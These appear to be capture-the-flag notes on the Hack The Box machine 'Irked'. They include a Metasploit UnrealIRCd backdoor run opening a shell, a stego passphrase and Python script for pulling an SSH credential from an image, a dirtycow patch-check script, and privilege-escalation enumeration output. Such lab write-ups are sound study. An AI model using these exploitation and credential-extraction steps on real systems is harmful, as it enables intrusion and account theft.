HTB ~~ Machines ~~ Irked
Leads:
- * ssh into ircd from the AWS VM so it is more convenient (push a key from the exploit)
- * go back over the basic info and check it point by point, with a clear head
- * stegano, with the password in the .backup and the image from the website
EDIT: the .backup + stegano lead was the right one to own user; use that for ssh afterwards
10.10.10.117 / Irked
PORT      STATE SERVICE    REASON
22/tcp    open  ssh        syn-ack ttl 63
80/tcp    open  http       syn-ack ttl 63
111/tcp   open  rpcbind    syn-ack ttl 63
6697/tcp  open  ircs-u     syn-ack ttl 63
8067/tcp  open  infi-async syn-ack ttl 63
49608/tcp open  unknown    syn-ack ttl 63
65534/tcp open  unknown    syn-ack ttl 63
-
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit -z
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Started bind TCP handler against 10.10.10.117:4444
[*] Command shell session 1 opened (10.10.15.18:42033 -> 10.10.10.117:4444) at 2019-02-17 14:12:00 +0000
[*] Session 1 created in the background.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) >
-
/home/ircd/Unreal3.2
ls ..
CVE-2014-5207_fuse_suid_3.16.1  CVE-2014-5207_fuse_suid_3.16.1.1  CVE-2014-5207_fuse_suid_3.16.1.c  test
-
.bash_history
cat ../djmardov/Documents/.backup
Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss
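Added example (mine, not from the page): the .backup note is a steghide passphrase, and the lead above says the website image is the carrier. The script pulls the passphrase out of the note and runs `steghide extract` non-interactively on an image you pass in; the image path is an argument because the page never names the file, and the `djmardov` login afterwards is the step the EDIT above describes.

```python
import re
import shutil
import subprocess
import sys
from pathlib import Path

# Constructed from the .backup line found above.
BACKUP_TEXT = "Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss\n"


def passphrase_from_backup(text):
    """The token after 'pw' in the one-line note; raises if the note has no such token."""
    m = re.search(r"\bpw\s+(\S+)", text)
    if not m:
        raise ValueError("no 'pw <passphrase>' token in backup note")
    return m.group(1)


def steghide_extract(image, passphrase, out_dir):
    """Run steghide extract with the passphrase on the command line.

    Returns {filename: contents} for whatever steghide wrote into out_dir.
    steghide must be installed (Debian/Kali: apt install steghide).
    """
    if shutil.which("steghide") is None:
        raise RuntimeError("steghide not installed")
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    before = {p.name for p in out_dir.iterdir()}
    # -sf: stego file, -p: passphrase, -f: overwrite an existing output file
    subprocess.run(
        ["steghide", "extract", "-sf", str(Path(image).resolve()), "-p", passphrase, "-f"],
        cwd=out_dir, check=True, capture_output=True,
    )
    new = [p for p in out_dir.iterdir() if p.name not in before]
    return {p.name: p.read_text(errors="replace").strip() for p in new}


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: steg_pull.py IMAGE", file=sys.stderr)
        sys.exit(1)
    pw = passphrase_from_backup(BACKUP_TEXT)
    for name, body in steghide_extract(sys.argv[1], pw, "extracted").items():
        print(name)
        print(body)
```

Whatever comes out is the candidate credential for `ssh djmardov@10.10.10.117`; the same file shows up with `steghide info -sf IMAGE -p PASSPHRASE` if you only want to confirm there is an embedded payload first.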
-
Available information:
Kernel version: 3.16.0
Architecture: i686
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
71 kernel space exploits
36 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Rank: 7
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 7
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
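Caveat, with an added check (mine, not part of the suggester): both dirtycow hits come from the `debian=8` tag, not from the kernel build. Debian fixed CVE-2016-5195 on jessie in linux 3.16.36-1+deb8u2 (DSA-3696-1, October 2016); the box runs 3.16.56-1+deb8u1 (2018-05-08), so this is a dead end. The script compares the package version embedded in `uname -a` against a known fixed version; the ordering is a simplified dpkg comparison that only understands the `X.Y.Z-N+debMuK` shape Debian kernel packages use, not the full `dpkg --compare-versions` rules.

```python
import re

# Constructed from the `uname -a` line recorded in these notes.
UNAME = ("Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 "
         "(2018-05-08) i686 GNU/Linux")

# Fixed package version for CVE-2016-5195 on jessie, per DSA-3696-1.
DIRTYCOW_FIXED_JESSIE = "3.16.36-1+deb8u2"

PKG_VERSION_RE = re.compile(r"Debian (\d+\.\d+\.\d+-\d+(?:\+deb\d+u\d+)?)")


def package_version_from_uname(uname_line):
    """The 'X.Y.Z-N[+debMuK]' string after 'Debian' in uname -a output."""
    m = PKG_VERSION_RE.search(uname_line)
    if not m:
        raise ValueError("no Debian package version in uname output")
    return m.group(1)


def version_key(version):
    """Comparable tuple for 'X.Y.Z-N[+debMuK]': ((X, Y, Z), (N, M, K)).

    Simplified ordering, enough for security-update comparisons within one
    stable release; revisions like '-ckt25-2' or '~bpo' suffixes are rejected.
    """
    upstream, _, revision = version.partition("-")
    parts = tuple(int(x) for x in upstream.split("."))
    m = re.fullmatch(r"(\d+)(?:\+deb(\d+)u(\d+))?", revision)
    if not m:
        raise ValueError("unsupported revision: %r" % revision)
    rev = tuple(int(g) if g is not None else 0 for g in m.groups())
    return (parts, rev)


def is_fixed(installed, fixed):
    """True when the installed package is at or beyond the fixed version."""
    return version_key(installed) >= version_key(fixed)


def check_dirtycow(uname_line, fixed=DIRTYCOW_FIXED_JESSIE):
    installed = package_version_from_uname(uname_line)
    return installed, is_fixed(installed, fixed)


if __name__ == "__main__":
    installed, fixed = check_dirtycow(UNAME)
    print("installed %s, fixed in %s -> %s" % (
        installed, DIRTYCOW_FIXED_JESSIE, "patched" if fixed else "possibly vulnerable"))
```

The same comparison works for any other suggester hit once you have the DSA's fixed version; the point is that distro tags tell you the exploit targets the release, not that the build in front of you is still affected.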
-
[-] Kernel information: Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux
[-] Kernel information (continued): Linux version 3.16.0-6-686-pae (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb8u1) ) #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08)
-
Starting unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )
-
python privesc.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.16.0-6-686-pae (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb8u1) ) #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08)
[+] Hostname
irked
[+] Operating System
Debian GNU/Linux 8 \n \l
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:f4:41
inet addr:10.10.10.117 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:f441/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feb9:f441/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1156590 errors:19 dropped:49 overruns:0 frame:0
TX packets:1062708 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:154870380 (147.6 MiB) TX bytes:285260521 (272.0 MiB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:29 errors:0 dropped:0 overruns:0 frame:0
TX packets:29 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3221 (3.1 KiB) TX bytes:3221 (3.1 KiB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN 654/ircd
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN 7118/python
tcp 0 0 0.0.0.0:8067 0.0.0.0:* LISTEN 654/ircd
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 654/ircd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:54578 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.117:32909 10.10.15.88:9001 ESTABLISHED 7195/bash
tcp 0 0 10.10.10.117:50190 10.10.12.129:4444 ESTABLISHED 4472/telnet
tcp 0 0 10.10.10.117:22 10.10.15.73:46050 ESTABLISHED -
tcp 0 0 10.10.10.117:41183 10.10.13.47:4444 ESTABLISHED 12776/telnet
tcp 0 0 10.10.10.117:36162 10.10.15.209:4444 ESTABLISHED 12753/telnet
tcp 0 0 10.10.10.117:41169 10.10.13.47:4444 ESTABLISHED 7674/telnet
tcp 33 0 10.10.10.117:6697 10.10.12.23:56986 ESTABLISHED 7214/sleep
tcp 0 0 10.10.10.117:43237 10.10.15.88:1153 ESTABLISHED 7183/telnet
tcp 0 0 10.10.10.117:34149 10.10.14.175:4444 ESTABLISHED 13249/telnet
tcp 0 0 10.10.10.117:36170 10.10.15.209:4444 ESTABLISHED 12805/telnet
tcp 0 0 10.10.10.117:22 10.10.13.217:59880 ESTABLISHED -
tcp 0 0 10.10.10.117:22 10.10.13.27:43730 ESTABLISHED -
tcp 0 0 10.10.10.117:50757 10.10.15.31:7191 ESTABLISHED 7539/telnet
tcp 0 0 10.10.10.117:36773 10.10.15.198:8888 ESTABLISHED 11944/sh
tcp 0 0 10.10.10.117:44029 10.10.12.40:4444 ESTABLISHED 7667/perl
tcp 34 0 10.10.10.117:6697 10.10.12.23:56966 CLOSE_WAIT 6312/sh
tcp 0 0 10.10.10.117:36163 10.10.15.209:4444 ESTABLISHED 12755/telnet
tcp 33 0 10.10.10.117:6697 10.10.12.23:56924 ESTABLISHED 2859/sh
tcp 0 0 10.10.10.117:22 10.10.14.218:37699 ESTABLISHED -
tcp 0 0 10.10.10.117:22 10.10.14.218:56078 ESTABLISHED -
tcp 0 0 10.10.10.117:35943 10.10.15.144:4444 ESTABLISHED 8027/telnet
tcp 0 0 10.10.10.117:51719 10.10.12.227:4444 ESTABLISHED 2860/telnet
tcp 0 0 10.10.10.117:41920 10.10.13.59:4444 ESTABLISHED 7217/telnet
tcp 0 0 10.10.10.117:22 10.10.13.27:43872 ESTABLISHED -
tcp 0 0 10.10.10.117:35944 10.10.15.144:4444 ESTABLISHED 8025/telnet
tcp 0 0 10.10.10.117:41921 10.10.13.59:4444 ESTABLISHED 7215/telnet
tcp 0 0 10.10.10.117:35954 10.10.15.144:4444 ESTABLISHED 12764/perl
tcp 0 0 10.10.10.117:50260 10.10.12.129:4444 ESTABLISHED 13285/telnet
tcp 0 0 10.10.10.117:44034 10.10.12.40:4444 ESTABLISHED 8097/perl
tcp 33 0 10.10.10.117:6697 10.10.12.23:57004 ESTABLISHED 7578/sleep
tcp 0 0 10.10.10.117:45553 10.10.12.83:4444 CLOSE_WAIT 1044/perl
tcp 0 0 10.10.10.117:22 10.10.13.27:43766 ESTABLISHED -
tcp 0 0 10.10.10.117:50261 10.10.12.129:4444 ESTABLISHED 13287/telnet
tcp 34 0 10.10.10.117:6697 10.10.12.23:56948 CLOSE_WAIT 4471/sh
tcp 0 0 10.10.10.117:34148 10.10.14.175:4444 ESTABLISHED 13251/telnet
tcp 0 0 10.10.10.117:47491 10.10.15.198:4444 ESTABLISHED 11922/telnet
tcp 0 0 10.10.10.117:47490 10.10.15.198:4444 ESTABLISHED 11920/telnet
tcp 33 0 10.10.10.117:6697 10.10.12.23:57030 ESTABLISHED 12802/sleep
tcp 0 0 10.10.10.117:52666 10.10.13.27:4444 ESTABLISHED 6392/telnet
tcp 0 0 10.10.10.117:50756 10.10.15.31:7191 ESTABLISHED 7537/telnet
tcp 0 0 10.10.10.117:41182 10.10.13.47:4444 ESTABLISHED 12774/telnet
tcp 0 0 10.10.10.117:42367 10.10.15.31:4433 ESTABLISHED 7546/MtGtX
tcp 0 0 10.10.10.117:41168 10.10.13.47:4444 ESTABLISHED 7672/telnet
tcp 0 1 10.10.10.117:38562 1.2.3.4:7029 SYN_SENT 654/ircd
tcp 0 0 10.10.10.117:36169 10.10.15.209:4444 ESTABLISHED 12803/telnet
tcp 0 0 10.10.10.117:55729 10.10.15.88:19577 ESTABLISHED 6357/telnet
tcp6 0 0 :::48051 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 445 10.10.10.117:80 10.10.13.36:60380 ESTABLISHED -
tcp6 0 511 10.10.10.117:80 10.10.13.36:60386 ESTABLISHED -
tcp6 0 453 10.10.10.117:80 10.10.14.52:40388 ESTABLISHED -
tcp6 1 0 ::1:53211 ::1:631 CLOSE_WAIT -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:636 0.0.0.0:* -
udp 0 0 0.0.0.0:33413 0.0.0.0:* -
udp 0 0 127.0.0.1:646 0.0.0.0:* -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:1900 0.0.0.0:* -
udp 0 0 0.0.0.0:45088 0.0.0.0:* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::636 :::* -
udp6 0 0 :::5353 :::* -
udp6 0 0 :::52008 :::* -
udp6 0 0 :::50226 :::* -
[+] Route
[*] GETTING FILESYSTEM INFO...
[+] Mount results
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=216704,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=414384k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=23,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
tmpfs on /run/user/1001 type tmpfs (rw,nosuid,nodev,relatime,size=207192k,mode=700,uid=1001,gid=1001)
tmpfs on /run/user/118 type tmpfs (rw,nosuid,nodev,relatime,size=207192k,mode=700,uid=118,gid=125)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=207192k,mode=700,uid=1000,gid=1000)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
fuse_suid on /home/ircd/test type fuse.fuse_suid (rw,nosuid,nodev,relatime,user_id=1001,group_id=1001)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=85e17c08-fee3-451a-a1f8-c95346ddc46c / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=29d1ae3e-562d-4323-b58c-2d48799f9632 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Jun 7 2015 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rw-r--r-- 1 root root 244 Dec 28 2014 anacron
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.daily:
total 84
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rwxr-xr-x 1 root root 311 Dec 28 2014 0anacron
-rwxr-xr-x 1 root root 625 Mar 31 2018 apache2
-rwxr-xr-x 1 root root 15000 Dec 11 2016 apt
-rwxr-xr-x 1 root root 314 Nov 8 2014 aptitude
-rwxr-xr-x 1 root root 355 Oct 17 2014 bsdmainutils
-rwxr-xr-x 1 root root 384 Oct 5 2014 cracklib-runtime
-rwxr-xr-x 1 root root 1597 May 2 2016 dpkg
-rwxr-xr-x 1 root root 4125 Feb 10 2018 exim4-base
-rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate
-rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate
-rwxr-xr-x 1 root root 249 Nov 19 2015 passwd
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.monthly:
total 24
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rwxr-xr-x 1 root root 313 Dec 28 2014 0anacron
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rwxr-xr-x 1 root root 312 Dec 28 2014 0anacron
-rwxr-xr-x 1 root root 771 Dec 31 2014 man-db
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
09:16:41 up 2:36, 5 users, load average: 0.10, 0.08, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
djmardov pts/0 10.10.13.27 06:41 1:18m 0.90s 0.90s -bash
djmardov pts/2 10.10.13.27 06:58 1:23m 0.17s 0.17s -bash
djmardov pts/15 10.10.14.218 08:48 20:28 0.17s 0.06s sshd: djmardov [priv]
djmardov pts/17 10.10.13.217 08:53 7:28 0.29s 0.29s -bash
[+] Super Users Found:
root
[+] Environment
MAIL=/var/mail/ircd
USER=ircd
HOME=/home/ircd
LOGNAME=ircd
XDG_SESSION_ID=c1
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/home/ircd/Unreal3.2
[+] Root and current user history (depends on privs)
-rw------- 1 ircd ircd 333 May 15 2018 /home/ircd/.bash_history
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
geoclue:x:110:119::/var/lib/geoclue:/bin/false
pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false
saned:x:115:124::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh
[+] Current User
ircd
[+] Current User ID
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 8 root root 4096 Mar 24 06:45 /var/tmp
drwxrwxrwt 16 root root 4096 Mar 24 09:16 /tmp
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.XIM-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.X11-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.Test-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.font-unix
drwxrwxrwt 5 root root 120 Mar 24 06:40 /run/lock
drwxrwxrwt 2 root root 40 Mar 24 06:40 /dev/mqueue
drwxrwxrwt 2 root root 120 Mar 24 06:40 /dev/shm
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
-rwxrwxrwx 1 ircd ircd 25305 Mar 24 07:52 /tmp/privesc.py
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
-rwxr-sr-x 1 root mail 13680 Dec 24 2016 /usr/lib/evolution/camel-lock-helper-1.2
-rwxr-sr-x 1 root utmp 13992 Jun 23 2014 /usr/lib/libvte-2.90-9/gnome-pty-helper
-rwxr-sr-x 1 root utmp 13992 Dec 5 2014 /usr/lib/libvte-2.91-0/gnome-pty-helper
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
drwxrwsr-t 2 root lpadmin 4096 Jul 23 2017 /usr/share/ppd/custom
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 17880 Nov 18 2017 /usr/bin/lockfile
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root shadow 21964 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root ssh 419192 Nov 19 2017 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwxr-sr-x 1 root shadow 61232 May 17 2017 /usr/bin/chage
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
drwxrwsr-x 10 root staff 4096 May 11 2018 /usr/local
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/include
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/etc
drwxrwsr-x 4 root staff 4096 May 11 2018 /usr/local/lib
drwxrwsr-x 4 root staff 4096 May 11 2018 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 3 root staff 4096 May 11 2018 /usr/local/lib/python3.4
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python3.4/dist-packages
drwxrwsr-x 8 root staff 4096 May 11 2018 /usr/local/share
drwxrwsr-x 6 root staff 4096 May 11 2018 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/man
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/ca-certificates
drwxrwsr-x 3 root staff 4096 May 11 2018 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/emacs/site-lisp
drwxrwsr-x 7 root staff 4096 May 11 2018 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/declaration
